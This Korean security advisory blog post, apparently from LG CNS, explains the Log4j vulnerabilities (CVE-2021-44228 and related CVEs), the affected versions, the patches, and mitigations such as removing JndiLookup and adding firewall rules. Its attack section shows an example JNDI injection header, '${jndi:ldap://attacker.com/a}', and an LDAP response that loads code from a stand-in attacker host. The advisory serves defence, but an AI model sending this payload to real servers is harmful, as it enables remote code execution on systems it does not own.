최근 발표된 Log4j 관련 보안상 치명적인 결점이 발견됨에 따라 긴급 조치가 필요합니다.
1. 개요
● Log4j에서 발생한 보안 경고로, 대부분 인터넷서비스에 영향이 있는 최상급 위험도를 가진 보안 취약점입니다. (12/10 이슈화)
● 악성코드 감염, 원격 명령 실행 등 심각한 피해를 방지하기 위한 보완 패치가 발표됐습니다.
● 취약점 정보와 함께 스캐너 등 공격툴도 인터넷에 공개된 상황으로 신속한 대응이 필요합니다.
● 취약 대상 버전 : Log4j 2.0-beta9 ~ 2.14.1(CVE-2021-44228)
※ Log4j : 자바 기반 로깅 유틸리티로 로그를 자동으로 출력해 주는 도구로서
서버, 프로그램의 운영 유지 관리 목적을 위해 범용으로 사용됩니다.
※12/30(목) 신규 업데이트
● 최근 Log4j의 다섯번째[1] 취약점(CVE-2021-44832)이 발견되었으며, CVSS는 6.6(medium)입니다.
● Log4j 2.17.0은 CVE-2021-44832를 해결하는 2.17.1로 패치해야 하며, 최신 버전 업데이트와 보안 조치를 필요합니다. [2] [3]
*참고 : [1] log4j취약점 발표 건수는 5건
à CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, CVE-2021-44832
*참고 : [2] CVE-2021-44832 관련 체크막스 블로그: https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/
*참고 : [3] NVD DB: NVD - CVE-2021-44832 (nist.gov)
※12/15(수) 신규 업데이트
● 최근 Log4j의 기존 보안 결점(CVE-2021-44228)을 우회해 공격할 수 있는 새로운 취약점이 발표됐습니다. 최신 버전 업데이트와 보안 조치를 필요합니다. [1]
● 주요 내용
- Apache Log4j 2에서 발생하는 DoS(Denial of Service, 서비스 거부) 공격 취약점(CVE 2021-45046) [2]
● 취약 대상 버전 : Apache Log4j 2.0-beta9 ~ 2.12.1, 2.13.0 ~ 2.15.0
*참고 : [1] https://logging.apache.org/log4j/2.x/
*참고 : [2] https://logging.apache.org/log4j/2.x/security.html#CVE-2021-45046
2. 특징
● 해커가 시스템의 모든 정보에 접근할 수 있는 권한을 획득할 수 있을 정도로 위험도가 높습니다.
● 웹서비스, 클라우드, IT솔루션 등 광범위한 서비스에 사용돼 피해 발생 가능성도 높습니다.
※ 제조사별 현황
- https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
3. 공격 방식
●상세 공격 기법(예시)
1] GET /anything HTTP/1.1
User-Agent: ${jndi:ldap://attacker.com/a} <= LDAP* 요청 구문
※ LDAP : 사용자/시스템/서비스 등의 정보를 찾아볼 수 있도록 하는 프로토콜입니다.
2] Query LDAP
3] LDAP Response
....
javaCodeBase: http://attacker.com
javaFactory: Exploit
4] 원격명령실행(RCE) 유형의 Malware 설치합니다.
* RCE: remote code execution
4. 대응 방안
● 아래의 버전으로 업데이트해야 합니다. [4][5]
- (Java 8 이상) 2.16.0
- (Java 7) 2.12.2
● (모든 버전) JndiLookup 클래스를 경로에서 제거 : zip -q -d log4j-core-*.jarorg/apache/logging/log4j/core/lookup/JndiLookup.class
※ 기존 환경 변수를 이용한 조치를 한 경우, 이번 DoS 취약점(CVE 2021-45046)에 취약합니다.
● 현재 log4j 취약점이 공개된 직후 외부에서 기업 네트워크 망을 공격하는 형태가 두드러지고 있습니다. 위험도를 감안해 외부에서 접속가능한 시스템부터 순차적으로(1차 외부망 & 2차 내부망) 보안 패치를 진행하는 것을 권장합니다.
1차) 외부망에서 직접 접속가능한 시스템 : 홈페이지 등 (ID/암호로 접속하는 사이트도 포함)
2차) 내부망 : 그룹웨어 등 사내시스템
*참고 : [4] https://logging.apache.org/log4j/2.x/download.html
*참고 : [5] https://logging.apache.org/log4j/log4j-2.12.1/download.html
● 공격 정보 차단
- 현재까지 알려진 위협정보를 기반으로 보안 패치 적용을 권고합니다.
- 공격 정보를 차단해 일부 방어가 가능합니다.
- 웹방화벽/IPS 차단 정책 적용(9개)
- 공격 IP 차단(33개)
※ 위에 제시한 격 구문과 IP 외 추가 위협 정보가 있으나, 현재까지 파악된 주요 위협 정보로 향후 추가될 수 있습니다.
■ log4j 취약점 대응 FAQ
글 ㅣ LG CNS 보안사업담당
*해당 콘텐츠는 저작권법에 의해 보호받는 저작물로 LG CNS 블로그에 저작권이 있습니다.
*해당 콘텐츠는 사전 동의없이 2차 가공 및 영리적인 이용을 금하고 있습니다.
'IT Solutions' 카테고리의 다른 글
| [Cloud보안] 클라우드가 온프레미스보다 안전한 3가지 이유! (0) | 2021.12.24 |
|---|---|
| [보안동향] 코앞으로 다가온 양자 컴퓨터, 포스트 양자암호를 찾아라! (0) | 2021.12.16 |
| 좋은 고객여정 찾기, ‘디자인씽킹’만 믿으세요! (0) | 2021.12.14 |
| [보안동향] 변화하는 정보보호 인증심사, DX 전문가가 알려드립니다! (0) | 2021.12.10 |
| 경험 끝판왕 TX(총체적 경험), 비밀은 IT에 있다! (0) | 2021.12.08 |
